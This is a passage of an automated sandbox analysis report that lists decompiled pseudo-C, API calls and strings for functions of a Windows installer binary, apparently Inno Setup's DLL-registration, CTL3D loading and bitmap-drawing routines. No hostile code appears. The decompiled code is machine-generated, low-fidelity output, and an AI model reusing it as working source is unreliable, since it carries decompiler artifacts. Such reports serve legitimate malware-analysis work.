				if(_t217 != 0) {
					_v132 = _t217;
					_v128 = 0;
					_v124 = GetLastError();
					_v120 = 0;
					E00452700("REGDLL mutex wait failed (%d, %d)", _t175, 1,  &_v132, _t214, _t217, _t230);
				}
				_t132 =  *((intOrPtr*)(_v20 + 8));
				_t198 = _t132 - 1;
				if(_t198 == 0) {
					E00452810("OleInitialize", _t175,  *((intOrPtr*)(_v20 + 0xc)), _t214, _t217, __eflags);
				} else {
					_t201 = _t198 - 1;
					if(_t201 == 0) {
						E00452758("LoadLibrary", _t175,  *((intOrPtr*)(_v20 + 0xc)), _t214, _t217, __eflags);
					} else {
						_t203 = _t201 - 1;
						if(_t203 == 0) {
							E00452758("GetProcAddress", _t175,  *((intOrPtr*)(_v20 + 0xc)), _t214, _t217, __eflags);
						} else {
							if(_t203 == 1) {
								_t151 = E004062C0( *((intOrPtr*)(_v20 + 0xc)));
								__eflags = _t151;
								if(_t151 != 0) {
									E0040352C( &_v116,  *0x00498ADC);
									E00452810(_v116, _t175,  *((intOrPtr*)(_v20 + 0xc)), _t214, _t217, __eflags);
								}
							} else {
								_v140 = _t132;
								_v136 = 0;
								E00452700("REGDLL returned unknown result code %d", _t175, 0,  &_v140, _t214, _t217, 0);
							}
						}
					}
				}
				_pop(_t200);
				 *[fs:eax] = _t200;
				_push(E004574A2);
				if(_v20 != 0) {
					UnmapViewOfFile(_v20);
				}
				if(_v16 != 0) {
					CloseHandle(_v16);
				}
				return CloseHandle(_v12);
			}

0x00457190
0x00457191
0x00457193
0x0045719b
0x0045719e
0x004571a1
0x004571a4
0x004571a7
0x004571aa
0x004571ac
0x004571b0
0x004571b1
0x004571b6
0x004571b9
0x004571c1
0x004571c8
0x004571cd
0x004571e2
0x004571e9
0x004571f0
0x004571f0
0x004571f7
0x004571f8
0x004571fd
0x00457200
0x0045721a
0x00457221
0x00457228
0x00457228
0x00457241
0x00457248
0x0045724f
0x0045724f
0x0045725e
0x00457266
0x0045726f
0x0045727d
0x00457288
0x00457298
0x004572a8
0x004572af
0x004572af
0x004572b7
0x004572bc
0x004572cc
0x004572d8
0x004572db
0x004572e2
0x004572e5
0x004572f6
0x00457305
0x0045730a
0x0045731c
0x00457324
0x0045733a
0x00457350
0x00457357
0x00457357
0x00457360
0x00457368
0x00457372
0x00457374
0x0045737a
0x0045738e
0x0045738e
0x0045739e
0x004573a0
0x004573a2
0x004573a4
0x004573a7
0x004573b0
0x004573b3
0x004573c4
0x004573c4
0x004573cc
0x004573d1
0x004573d2
0x004573ea
0x004573d4
0x004573d4
0x004573d5
0x004573fc
0x004573d7
0x004573d7
0x004573d8
0x0045740e
0x004573da
0x004573db
0x0045741b
0x00457420
0x00457422
0x00457432
0x00457440
0x00457440
0x004573dd
0x00457447
0x0045744d
0x00457461
0x00457461
0x004573db
0x004573d8
0x004573d5
0x00457468
0x0045746b
0x0045746e
0x00457477
0x0045747d
0x0045747d
0x00457486
0x0045748c
0x0045748c
0x0045749a

APIs

CreateMutexA.KERNEL32(00498AE4,00000001,00000000,00000000,004574C5,?,?,?,00000001,?,004576DF,00000000,004576F5,?,00000000,0049A628), ref: 004571DD
CreateFileMappingA.KERNEL32 ref: 00457215
MapViewOfFile.KERNEL32(00000000,00000002,00000000,00000000,00002018,000000FF,00498AE4,00000004,00000000,00002018,00000000,00000000,0045749B,?,00498AE4,00000001), ref: 0045723C
CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,00000000,004576DF), ref: 00457349
ReleaseMutex.KERNEL32(00000000,00000000,00000002,00000000,00000000,00002018,000000FF,00498AE4,00000004,00000000,00002018,00000000,00000000,0045749B,?,00498AE4), ref: 004572A1

Part of subcall function 004527FC: GetLastError.KERNEL32(00000000,0045326D,00000005,00000000,004532A2,?,?,00000000,0049A628,00000004,00000000,00000000,00000000,?,004966A1,00000000), ref: 004527FF

CloseHandle.KERNEL32(00002018,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,00000000,004576DF), ref: 00457360
WaitForSingleObject.KERNEL32(00000000,000000FF,00002018,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,00000000,004576DF), ref: 00457399
GetLastError.KERNEL32(00000000,000000FF,00002018,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,00000000,004576DF), ref: 004573AB
UnmapViewOfFile.KERNEL32(00000000,004574A2,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,00000000,004576DF), ref: 0045747D
CloseHandle.KERNEL32(00000000,004574A2,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,00000000,004576DF), ref: 0045748C
CloseHandle.KERNEL32(00000000,004574A2,00000000,00000000,00000000,00000000,00000001,04000000,00000000,00000000,00000044,00000000,004576DF), ref: 00457495

Strings

REGDLL mutex wait failed (%d, %d), xrefs: 004573BF
CreateProcess, xrefs: 00457352
D, xrefs: 0045730A
REGDLL failed with exit code 0x%x, xrefs: 00457389
REGDLL returned unknown result code %d, xrefs: 0045745C
CreateFileMapping, xrefs: 00457223
ReleaseMutex, xrefs: 004572AA
Spawning _RegDLL.tmp, xrefs: 004571BC
_isetup\_RegDLL.tmp, xrefs: 004572C7
_RegDLL.tmp %u %u, xrefs: 004572F1
LoadLibrary, xrefs: 004573F7
OleInitialize, xrefs: 004573E5
CreateMutex, xrefs: 004571EB
GetProcAddress, xrefs: 00457409
MapViewOfFile, xrefs: 0045724A

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: CloseCreateFileHandle$ErrorLastMutexView$MappingObjectProcessReleaseSingleUnmapWait
String ID: CreateFileMapping$CreateMutex$CreateProcess$D$GetProcAddress$LoadLibrary$MapViewOfFile$OleInitialize$REGDLL failed with exit code 0x%x$REGDLL mutex wait failed (%d, %d)$REGDLL returned unknown result code %d$ReleaseMutex$Spawning _RegDLL.tmp$_RegDLL.tmp %u %u$_isetup\_RegDLL.tmp
API String ID: 4012871263-351310198
Opcode ID: 8a8a5b765fa777d5586101ed562cabb39c00570cec285a9c86e43c095d9185dc
Instruction ID: 870ad647c48dc3efa25840664050ee9e4fa5cab4438307bec821336cb5c74a63
Opcode Fuzzy Hash: 8a8a5b765fa777d5586101ed562cabb39c00570cec285a9c86e43c095d9185dc
Instruction Fuzzy Hash: 66917270A042199BDB10EBA9D845B9EBBB5FB09305F10857BF814EB383D7789908CF59

Uniqueness

Uniqueness Score: -1.00%

Function 0041F100 Relevance: 45.6, APIs: 15, Strings: 11, Instructions: 87
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E0041F100() {
				int _t1;
				struct HINSTANCE__* _t2;
				intOrPtr _t4;
				struct HINSTANCE__* _t6;
				int _t7;
				struct HINSTANCE__* _t8;
				struct HINSTANCE__* _t10;
				struct HINSTANCE__* _t12;
				struct HINSTANCE__* _t14;
				struct HINSTANCE__* _t16;
				struct HINSTANCE__* _t18;
				struct HINSTANCE__* _t20;
				struct HINSTANCE__* _t22;
				struct HINSTANCE__* _t24;
				_Unknown_base(*)()* _t25;
				signed int _t27;

				if( *0x498590 != 0) {
					L10:
					return _t1;
				}
				_t1 = GetVersion();
				_t30 = _t1;
				if(_t1 < 4) {
					_t1 = E00406268(_t30);
					if(_t1 < 0x59) {
						_t27 = SetErrorMode(0x8000);
						 *0x498590 = LoadLibraryA("CTL3D32.DLL");
						_t1 = SetErrorMode(_t27 & 0x0000ffff);
					}
				}
				if( *0x498590 < 0x20) {
					 *0x498590 = 1;
				}
				if( *0x498590 < 0x20) {
					goto L10;
				} else {
					_t2 =  *0x498590; // 0x1
					 *0x49a630 = GetProcAddress(_t2, "Ctl3dRegister");
					_t4 =  *0x49a014; // 0x400000
					_push(_t4);
					if( *0x49a630() == 0) {
						_t6 =  *0x498590; // 0x1
						_t7 = FreeLibrary(_t6);
						 *0x498590 = 1;
						return _t7;
					}
					_t8 =  *0x498590; // 0x1
					 *0x49a634 = GetProcAddress(_t8, "Ctl3dUnregister");
					_t10 =  *0x498590; // 0x1
					 *0x49a638 = GetProcAddress(_t10, "Ctl3dSubclassCtl");
					_t12 =  *0x498590; // 0x1
					 *0x49a63c = GetProcAddress(_t12, "Ctl3dSubclassDlgEx");
					_t14 =  *0x498590; // 0x1
					 *0x49856c = GetProcAddress(_t14, "Ctl3dDlgFramePaint");
					_t16 =  *0x498590; // 0x1
					 *0x498570 = GetProcAddress(_t16, "Ctl3dCtlColorEx");
					_t18 =  *0x498590; // 0x1
					 *0x49a640 = GetProcAddress(_t18, "Ctl3dAutoSubclass");
					_t20 =  *0x498590; // 0x1
					 *0x49a644 = GetProcAddress(_t20, "Ctl3dUnAutoSubclass");
					_t22 =  *0x498590; // 0x1
					 *0x49a648 = GetProcAddress(_t22, "Ctl3DColorChange");
					_t24 =  *0x498590; // 0x1
					_t25 = GetProcAddress(_t24, "BtnWndProc3d");
					 *0x498568 = _t25;
					return _t25;
				}
			}

0x0041f108
0x0041f267
0x0041f267
0x0041f267
0x0041f10e
0x0041f113
0x0041f118
0x0041f11c
0x0041f123
0x0041f12a
0x0041f13b
0x0041f144
0x0041f144
0x0041f123
0x0041f150
0x0041f152
0x0041f152
0x0041f163
0x00000000
0x0041f169
0x0041f16e
0x0041f179
0x0041f17e
0x0041f183
0x0041f18c
0x0041f251
0x0041f257
0x0041f25c
0x00000000
0x0041f25c
0x0041f197
0x0041f1a2
0x0041f1ac
0x0041f1b7
0x0041f1c1
0x0041f1cc
0x0041f1d6
0x0041f1e1
0x0041f1eb
0x0041f1f6
0x0041f200
0x0041f20b
0x0041f215
0x0041f220
0x0041f22a
0x0041f235
0x0041f23f
0x0041f245
0x0041f24a
0x00000000
0x0041f24a

APIs

GetVersion.KERNEL32(?,00418FD8,00000000,?,?,00000001,00000000), ref: 0041F10E
SetErrorMode.KERNEL32(00008000,?,00418FD8,00000000,?,?,00000001,00000000), ref: 0041F12A
LoadLibraryA.KERNEL32(CTL3D32.DLL,00008000,?,00418FD8,00000000,?,?,00000001,00000000), ref: 0041F136
SetErrorMode.KERNEL32(00000000,CTL3D32.DLL,00008000,?,00418FD8,00000000,?,?,00000001,00000000), ref: 0041F144
GetProcAddress.KERNEL32(00000001,Ctl3dRegister), ref: 0041F174
GetProcAddress.KERNEL32(00000001,Ctl3dUnregister), ref: 0041F19D
GetProcAddress.KERNEL32(00000001,Ctl3dSubclassCtl), ref: 0041F1B2
GetProcAddress.KERNEL32(00000001,Ctl3dSubclassDlgEx), ref: 0041F1C7
GetProcAddress.KERNEL32(00000001,Ctl3dDlgFramePaint), ref: 0041F1DC
GetProcAddress.KERNEL32(00000001,Ctl3dCtlColorEx), ref: 0041F1F1
GetProcAddress.KERNEL32(00000001,Ctl3dAutoSubclass), ref: 0041F206
GetProcAddress.KERNEL32(00000001,Ctl3dUnAutoSubclass), ref: 0041F21B
GetProcAddress.KERNEL32(00000001,Ctl3DColorChange), ref: 0041F230
GetProcAddress.KERNEL32(00000001,BtnWndProc3d), ref: 0041F245
FreeLibrary.KERNEL32(00000001,?,00418FD8,00000000,?,?,00000001,00000000), ref: 0041F257

Strings

Ctl3dRegister, xrefs: 0041F169
BtnWndProc3d, xrefs: 0041F23A
Ctl3dSubclassDlgEx, xrefs: 0041F1BC
Ctl3dDlgFramePaint, xrefs: 0041F1D1
Ctl3dUnAutoSubclass, xrefs: 0041F210
Ctl3dCtlColorEx, xrefs: 0041F1E6
CTL3D32.DLL, xrefs: 0041F131
Ctl3dSubclassCtl, xrefs: 0041F1A7
Ctl3dUnregister, xrefs: 0041F192
Ctl3DColorChange, xrefs: 0041F225
Ctl3dAutoSubclass, xrefs: 0041F1FB

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: AddressProc$ErrorLibraryMode$FreeLoadVersion
String ID: BtnWndProc3d$CTL3D32.DLL$Ctl3DColorChange$Ctl3dAutoSubclass$Ctl3dCtlColorEx$Ctl3dDlgFramePaint$Ctl3dRegister$Ctl3dSubclassCtl$Ctl3dSubclassDlgEx$Ctl3dUnAutoSubclass$Ctl3dUnregister
API String ID: 2323315520-3614243559
Opcode ID: 00c20232f59cf9a388fe9ee594bd5cdf4a979091097889aa93c4903888548012
Instruction ID: e75ef8e9785ca8da0ec2f52b361472fa3148a28f62a6d5e7c99c44d7bde1c01c
Opcode Fuzzy Hash: 00c20232f59cf9a388fe9ee594bd5cdf4a979091097889aa93c4903888548012
Instruction Fuzzy Hash: 2E3130B0600700EBDF00EBB9AC86A653294F729724B45093FB644DB1A2DB7E485ECB1C

Uniqueness

Uniqueness Score: -1.00%

Function 0041C9F4 Relevance: 33.2, APIs: 22, Instructions: 213
windowCOMMON

Download Yara Rule

C-Code - Quality: 47%

			E0041C9F4(void* __eax, int __ecx, intOrPtr __edx, char _a4, intOrPtr _a8, int _a12) {
				void* _v8;
				intOrPtr _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				struct HDC__* _v28;
				struct HDC__* _v32;
				struct HDC__* _v36;
				struct tagRECT _v52;
				struct HDC__* _t58;
				void* _t60;
				intOrPtr _t71;
				struct HDC__* _t72;
				struct HBRUSH__* _t105;
				intOrPtr _t125;
				intOrPtr _t136;
				intOrPtr _t137;
				intOrPtr _t138;
				int _t141;
				int _t144;
				void* _t147;
				void* _t149;
				intOrPtr _t150;

				_t147 = _t149;
				_t150 = _t149 + 0xffffffd0;
				_t144 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				_t125 = _a8;
				_t141 = _a12;
				_v16 = 0;
				if(_v8 != 0 || __ecx != 0 && _t141 != 0) {
					_push(0);
					L00405F14();
					_v28 = 0;
					_t58 = _v28;
					_push(_t58);
					L00405BBC();
					_v32 = _t58;
					_push(_t147);
					_push(0x41cc4a);
					_push( *[fs:eax]);
					 *[fs:eax] = _t150;
					if(_a4 == 0) {
						_push(_t141);
						_push(_t144);
						_t60 = _v28;
						_push(_t60);
						L00405BB4();
						_v16 = _t60;
					} else {
						_push(0);
						_push(1);
						_push(1);
						_push(_t141);
						_push(_t144);
						L00405BA4();
						_v16 = 0;
					}
					if(_v16 == 0) {
						E0041B37C();
					}
					_v24 = SelectObject(_v32, _v16);
					_push(_t147);
					_push(0x41cc03);
					_push( *[fs:eax]);
					 *[fs:eax] = _t150;
					if(_t125 == 0) {
						PatBlt(_v32, 0, 0, _t144, _t141, 0xff0062);
					} else {
						_t105 = E0041A6C8( *((intOrPtr*)(_t125 + 0x14)));
						E0040AC20(0, _t144, 0,  &_v52, _t141);
						FillRect(_v32,  &_v52, _t105);
						SetTextColor(_v32, E0041A040( *((intOrPtr*)( *((intOrPtr*)(_t125 + 0xc)) + 0x10))));
						SetBkColor(_v32, E0041A040(E0041A68C( *((intOrPtr*)(_t125 + 0x14)))));
					}
					if(_v8 == 0) {
						_pop(_t136);
						 *[fs:eax] = _t136;
						_pop(_t137);
						 *[fs:eax] = _t137;
						_push(0x41cc51);
						DeleteDC(_v32);
						_t71 = _v28;
						_push(_t71);
						_push(0);
						L004060FC();
						return _t71;
					} else {
						_t72 = _v28;
						_push(_t72);
						L00405BBC();
						_v36 = _t72;
						if(_v36 == 0) {
							E0041B37C();
						}
						_push(_t147);
						_push(0x41cbf2);
						_push( *[fs:eax]);
						 *[fs:eax] = _t150;
						E0041C820(_v8);
						_v20 = SelectObject(_v36, _v8);
						if(_v12 != 0) {
							_push(1);
							_push(_v12);
							_push(_v36);
							L00405D0C();
							_push(_v36);
							L00405CCC();
							_push(1);
							_push(_v12);
							_push(_v32);
							L00405D0C();
							_push(_v32);
							L00405CCC();
						}
						if(_t125 != 0) {
							SetTextColor(_v36, E0041A040( *((intOrPtr*)( *((intOrPtr*)(_t125 + 0xc)) + 0x10))));
							SetBkColor(_v36, E0041A040(E0041A68C( *((intOrPtr*)(_t125 + 0x14)))));
						}
						_push(0xcc0020);
						_push(0);
						_push(0);
						_push(_v36);
						_push(_t141);
						_push(_t144);
						_push(0);
						_push(0);
						_push(_v32);
						L00405B94();
						SelectObject(_v36, _v20);
						_pop(_t138);
						 *[fs:eax] = _t138;
						_push(0x41cbf9);
						return DeleteDC(_v36);
					}
				} else {
					return _v16;
				}
			}

0x0041c9f5
0x0041c9f7
0x0041c9fd
0x0041c9ff
0x0041ca02
0x0041ca05
0x0041ca08
0x0041ca0d
0x0041ca14
0x0041ca26
0x0041ca28
0x0041ca2d
0x0041ca30
0x0041ca33
0x0041ca34
0x0041ca39
0x0041ca3e
0x0041ca3f
0x0041ca44
0x0041ca47
0x0041ca4e
0x0041ca62
0x0041ca63
0x0041ca64
0x0041ca67
0x0041ca68
0x0041ca6d
0x0041ca50
0x0041ca50
0x0041ca52
0x0041ca54
0x0041ca56
0x0041ca57
0x0041ca58
0x0041ca5d
0x0041ca5d
0x0041ca74
0x0041ca76
0x0041ca76
0x0041ca88
0x0041ca8d
0x0041ca8e
0x0041ca93
0x0041ca96
0x0041ca9b
0x0041cb00
0x0041ca9d
0x0041caa0
0x0041cab1
0x0041cabe
0x0041cad3
0x0041caea
0x0041caea
0x0041cb09
0x0041cbfb
0x0041cbfe
0x0041cc2a
0x0041cc2d
0x0041cc30
0x0041cc39
0x0041cc3e
0x0041cc41
0x0041cc42
0x0041cc44
0x0041cc49
0x0041cb0f
0x0041cb0f
0x0041cb12
0x0041cb13
0x0041cb18
0x0041cb1f
0x0041cb21
0x0041cb21
0x0041cb28
0x0041cb29
0x0041cb2e
0x0041cb31
0x0041cb37
0x0041cb49
0x0041cb50
0x0041cb52
0x0041cb57
0x0041cb5b
0x0041cb5c
0x0041cb64
0x0041cb65
0x0041cb6a
0x0041cb6f
0x0041cb73
0x0041cb74
0x0041cb7c
0x0041cb7d
0x0041cb7d
0x0041cb84
0x0041cb96
0x0041cbad
0x0041cbad
0x0041cbb2
0x0041cbb7
0x0041cbb9
0x0041cbbe
0x0041cbbf
0x0041cbc0
0x0041cbc1
0x0041cbc3
0x0041cbc8
0x0041cbc9
0x0041cbd6
0x0041cbdd
0x0041cbe0
0x0041cbe3
0x0041cbf1
0x0041cbf1
0x0041cc51
0x0041cc5a
0x0041cc5a

APIs

740BAC50.USER32(00000000,?,0041A92C,?), ref: 0041CA28
740BA590.GDI32(?,00000000,?,0041A92C,?), ref: 0041CA34
740BA410.GDI32(0041A92C,?,00000001,00000001,00000000,00000000,0041CC4A,?,?,00000000,?,0041A92C,?), ref: 0041CA58
740BA520.GDI32(?,0041A92C,?,00000000,0041CC4A,?,?,00000000,?,0041A92C,?), ref: 0041CA68
SelectObject.GDI32(0041CE24,00000000), ref: 0041CA83
FillRect.USER32 ref: 0041CABE
SetTextColor.GDI32(0041CE24,00000000), ref: 0041CAD3
SetBkColor.GDI32(0041CE24,00000000), ref: 0041CAEA
PatBlt.GDI32(0041CE24,00000000,00000000,0041A92C,?,00FF0062), ref: 0041CB00
740BA590.GDI32(?,00000000,0041CC03,?,0041CE24,00000000,?,0041A92C,?,00000000,0041CC4A,?,?,00000000,?,0041A92C), ref: 0041CB13
SelectObject.GDI32(00000000,00000000), ref: 0041CB44
740BB410.GDI32(00000000,00000000,00000001,00000000,00000000,00000000,0041CBF2,?,?,00000000,0041CC03,?,0041CE24,00000000,?,0041A92C), ref: 0041CB5C
740BB150.GDI32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,0041CBF2,?,?,00000000,0041CC03,?,0041CE24,00000000,?), ref: 0041CB65
740BB410.GDI32(0041CE24,00000000,00000001,00000000,00000000,00000000,00000001,00000000,00000000,00000000,0041CBF2,?,?,00000000,0041CC03), ref: 0041CB74
740BB150.GDI32(0041CE24,0041CE24,00000000,00000001,00000000,00000000,00000000,00000001,00000000,00000000,00000000,0041CBF2,?,?,00000000,0041CC03), ref: 0041CB7D
SetTextColor.GDI32(00000000,00000000), ref: 0041CB96
SetBkColor.GDI32(00000000,00000000), ref: 0041CBAD
740C97E0.GDI32(0041CE24,00000000,00000000,0041A92C,?,00000000,00000000,00000000,00CC0020,00000000,00000000,00000000,0041CBF2,?,?,00000000), ref: 0041CBC9
SelectObject.GDI32(00000000,?), ref: 0041CBD6
DeleteDC.GDI32(00000000), ref: 0041CBEC

Part of subcall function 0041A040: GetSysColor.USER32(?), ref: 0041A04A

Memory Dump Source

Source File: 00000001.00000002.324242235.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.324237646.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324312936.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324318502.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324323450.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.324329962.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_file.jbxd

Similarity

API ID: Color$ObjectSelect$A590B150B410Text$A410A520DeleteFillRect
String ID:
API String ID: 161883734-0
Opcode ID: de79c7301e96d263e04f76b1d1fff43ddd2212d67a81a1b169251bf9af5b21e9
Instruction ID: 93eb53f71a61efd942bda77c34e7880863c2c581daf8b9aec5ac9681a14449cf
Opcode Fuzzy Hash: de79c7301e96d263e04f76b1d1fff43ddd2212d67a81a1b169251bf9af5b21e9
Instruction Fuzzy Hash: 2961E071A44604ABDF10EBE9DC86F9FB7B8EF48704F11446AF504F7281D67CA9408B69

Uniqueness

Uniqueness Score: -1.00%

Function 004966CC Relevance: 26.5, APIs: 7, Strings: 8, Instructions: 251
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 74%

			E004966CC(void* __ebx, void* __edi, void* __esi) {
				char _v5;
				char _v6;
				void* _v12;
				intOrPtr _v16;
				char _v20;
				char _v24;
				void* _v28;
				char _v32;
				char _v36;
				char _v44;
				char _t63;
				void* _t119;
				intOrPtr _t121;
				intOrPtr _t125;
				char _t126;
				char _t130;
				char _t135;
				char _t138;
				long _t151;
				int _t155;
				intOrPtr _t177;
				intOrPtr _t184;
				intOrPtr _t185;
				intOrPtr _t187;
				intOrPtr _t190;
				intOrPtr _t193;
				intOrPtr _t199;
				intOrPtr _t200;

				_t197 = __esi;
				_t196 = __edi;
				_t199 = _t200;
				_t155 = 5;
				do {
					_push(0);
					_push(0);
					_t155 = _t155 - 1;
				} while (_t155 != 0);
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_push(_t199);
				_push(0x496a64);
				_push( *[fs:eax]);
				 *[fs:eax] = _t200;
				_t1 =  &_v36; // 0x496e25
				E0042D3F0(1, 0x49a628, _t1, __edi, __esi);
				_t2 =  &_v36; // 0x496e25
				if(E00406AA4( *_t2, 0x496a7c) != 0) {
					_t4 =  &_v36; // 0x496e25
					E0042D3F0(1, 0x49a628, _t4, __edi, __esi);
					_t5 =  &_v36; // 0x496e25
					_t63 = E00406AA4( *_t5, 0x496a8c);
					__eflags = _t63;
					if(_t63 != 0) {
						__eflags = 0;
						_pop(_t177);
						 *[fs:eax] = _t177;
						_push(E00496A6B);
						return E00403420( &_v44, 7);
					} else {
						_v5 = 0;
						goto L6;
					}
				} else {
					_v5 = 1;
					L6:
					E004242AC( *0x49a628, 0x496a9c, _t196);
					ShowWindow( *( *0x49a628 + 0x20), 5);
					E0047D408();
					_v12 = CreateMutexA(0, 0, "Inno-Setup-RegSvr-Mutex");
					ShowWindow( *( *0x49a628 + 0x20), 0);
					if(_v12 != 0) {
						do {
							E00424494( *0x49a628);
							_t151 = MsgWaitForMultipleObjects(1,  &_v12, 0, 0xffffffff, 0xff);
							_t204 = _t151 == 1;
						} while (_t151 == 1);
					}
					ShowWindow( *( *0x49a628 + 0x20), 5);
					_push(_t199);
					_push(0x496a42);
					_push( *[fs:eax]);
					 *[fs:eax] = _t200;
					_t13 =  &_v36; // 0x496e25
					E0042D3F0(0, 0x49a628, _t13, _t196, _t197);
					_t14 =  &_v36; // 0x496e25
					E0042C49C( *_t14, 0x49a628,  &_v20, 0x496ac4, _t196, _t197, _t204);
					_t16 =  &_v36; // 0x496e25
					E0042D3F0(0, 0x49a628, _t16, _t196, _t197);
					_t17 =  &_v36; // 0x496e25
					_t18 =  &_v24; // 0x496e5c
					_t159 = _t18;
					E0042C49C( *_t17, 0x49a628, _t18, 0x496ad4, _t196, _t197, _t204);
					_t19 =  &_v24; // 0x496e5c
					if(E0042CCC8( *_t19) == 0) {
						_t49 =  &_v24; // 0x496e5c
						E00406F30( *_t49);
						E00406F30(_v20);
						_push(_t199);
						_push( *[fs:eax]);
						 *[fs:eax] = _t200;
						E00496628(0x49a628, _t159, _t196, _t197, __eflags);
						_pop(_t184);
						 *[fs:eax] = _t184;
						_t185 = 0x496a12;
						 *[fs:eax] = _t185;
						_push(E00496A49);
						__eflags = _v12;
						if(_v12 != 0) {
							ReleaseMutex(_v12);
							return CloseHandle(_v12);
						}
						return 0;
					} else {
						E0042ED78(E00450910(_v20, 0x49a628, 1, 0, _t196, _t197) & 0xffffff00 | ( *0x49af90 & 0x00000001) != 0x00000000);
						_t187 =  *0x49ae78; // 0x227eb84
						E004242AC( *0x49a628, _t187, _t196);
						_push(_t199);
						_push(0x4969de);
						_push( *[fs:eax]);
						 *[fs:eax] = _t200;
						E0047B174(0x49a628, _t187, _t196, _t197);
						_v16 = E0044FA8C(1, 1, 0, 2);
						_push(_t199);
						_push(0x4969c4);
						_push( *[fs:eax]);
						 *[fs:eax] = _t200;
						while(E0044FD20(_v16) == 0) {
							E0044FD30(_v16,  &_v28);
							_t119 = E00403574(_v28);
							__eflags = _t119 - 4;
							if(_t119 > 4) {
								__eflags =  *_v28 - 0x5b;
								if( *_v28 == 0x5b) {
									_t121 = _v28;
									__eflags =  *((char*)(_t121 + 3)) - 0x5d;
									if( *((char*)(_t121 + 3)) == 0x5d) {
										E00403778(_v28, 0x7fffffff, 5,  &_v32);
										_t125 = _v28;
										__eflags =  *((char*)(_t125 + 2)) - 0x71;
										if( *((char*)(_t125 + 2)) == 0x71) {
											L17:
											_t126 = 1;
										} else {
											__eflags = _v5;
											if(_v5 == 0) {
												L16:
												_t126 = 0;
											} else {
												__eflags =  *0x49b372;
												if( *0x49b372 == 0) {
													goto L17;
												} else {
													goto L16;
												}
											}
										}
										_v6 = _t126;
										_push(_t199);
										_push(0x496934);
										_push( *[fs:eax]);
										 *[fs:eax] = _t200;
										_t130 =  *((intOrPtr*)(_v28 + 1)) - 0x53;
										__eflags = _t130;
										if(_t130 == 0) {
											E00457670(0, 0x49a628, _v32, 1, _t196, _t197, _v6);
										} else {
											_t135 = _t130 - 1;
											__eflags = _t135;
											if(_t135 == 0) {
												__eflags = 0;
												E00457830(0, 0x49a628, _v32, _t196, _t197, 0);
											} else {
												_t138 = _t135 - 0x1f;
												__eflags = _t138;
												if(_t138 == 0) {
													E00457670(0, 0x49a628, _v32, 0, _t196, _t197, _v6);
												} else {
													__eflags = _t138 == 1;
													if(_t138 == 1) {
														E00455A40(_v32, 0x49a628, _t196, _t197);
													}
												}
											}
										}
										_pop(_t193);
										 *[fs:eax] = _t193;
									}
								}
							}
						}
						_pop(_t190);
						 *[fs:eax] = _t190;
						_push(E004969CB);
						return E00402B58(_v16);
					}
				}
			}

0x004966cc
0x004966cc
0x004966cd
0x004966cf
0x004966d4
0x004966d4
0x004966d6
0x004966d8
0x004966d8
0x004966db
0x004966dc
0x004966dd
0x004966e5
0x004966e6
0x004966eb
0x004966ee
0x004966f1
0x004966f9
0x004966fe
0x0049670d
0x00496715
0x0049671d
0x00496722
0x0049672a
0x0049672f
0x00496731
0x00496a49
0x00496a4b
0x00496a4e
0x00496a51
0x00496a63
0x00496737
0x00496737
0x00000000
0x00496737
0x0049670f
0x0049670f
0x0049673b
0x00496742
0x0049674f
0x00496754
0x00496767
0x00496772
0x0049677b
0x0049677d
0x0049677f
0x00496793
0x00496798
0x00496798
0x0049677d
0x004967a3
0x004967aa
0x004967ab
0x004967b0
0x004967b3
0x004967b6
0x004967bb
0x004967c0
0x004967cb
0x004967d0
0x004967d5
0x004967da
0x004967dd
0x004967dd
0x004967e5
0x004967ea
0x004967f4
0x004969e5
0x004969e8
0x004969f0
0x004969f7
0x004969fd
0x00496a00
0x00496a03
0x00496a0a
0x00496a0d
0x00496a1e
0x00496a21
0x00496a24
0x00496a29
0x00496a2d
0x00496a33
0x00000000
0x00496a3c
0x00496a41
0x004967fa
